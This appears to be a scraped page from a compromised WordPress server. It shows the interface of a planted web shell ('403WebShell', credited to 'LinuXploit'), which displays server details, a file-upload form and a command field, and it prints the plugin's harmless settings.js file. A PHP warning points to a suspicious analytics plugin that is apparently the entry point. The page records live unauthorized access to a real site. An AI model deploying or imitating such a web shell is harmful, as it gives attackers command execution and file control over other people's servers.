Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/hopeinstoughton_www/wp-content/plugins/user-role-editor/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hopeinstoughton_www/wp-content/plugins/user-role-editor/js/settings.js
/*
 * User Role Editor WordPress plugin JavaScript for Settings page
 */ 

function ure_ui_button_text(caption) {
    var wrapper = '<span class="ui-button-text">' + caption + '</span>';

    return wrapper;
}

function ure_roles_reset_form_submit() {
    jQuery('#ure_reset_roles_form').submit();
}

jQuery(function() {   
                
    jQuery('#ure_reset_roles_button').button({
        label: ure_data.reset
    }).click(function (event) {
        event.preventDefault();        
        ure_confirm(ure_data.reset_warning, ure_roles_reset_form_submit);
    });
    
    function ure_confirm(message, routine) {

        jQuery('#ure_confirmation_dialog').dialog({
            dialogClass: 'wp-dialog',
            modal: true,
            autoOpen: true,
            closeOnEscape: true,
            width: 600,
            height: 280,
            resizable: false,
            title: ure_data.confirm_title,
            'buttons': {
                'No': function () {
                    jQuery(this).dialog('close');
                    return false;
                },
                'Yes': function () {
                    jQuery(this).dialog('close');
                    routine();
                    return true;
                }
            }
        });
        jQuery('#ure_cd_html').html(message);
        jQuery('.ui-dialog-buttonpane button:contains("No")').attr('id', 'dialog-no-button');
        jQuery('#dialog-no-button').html(ure_ui_button_text(ure_data.no_label));
        jQuery('.ui-dialog-buttonpane button:contains("Yes")').attr('id', 'dialog-yes-button');
        jQuery('#dialog-yes-button').html(ure_ui_button_text(ure_data.yes_label));

    }
    // end of ure_confirm()


    jQuery('#ure_reset_roles_secure').on('input', function() {
        if ( this.value===ure_data.reset_roles_secure_text ) {
            jQuery('#ure_reset_roles_button').button('enable');
        } else {
            jQuery('#ure_reset_roles_button').button('disable');
        }
    }); 
    
});

Youez - 2016 - github.com/yon3zu
LinuXploit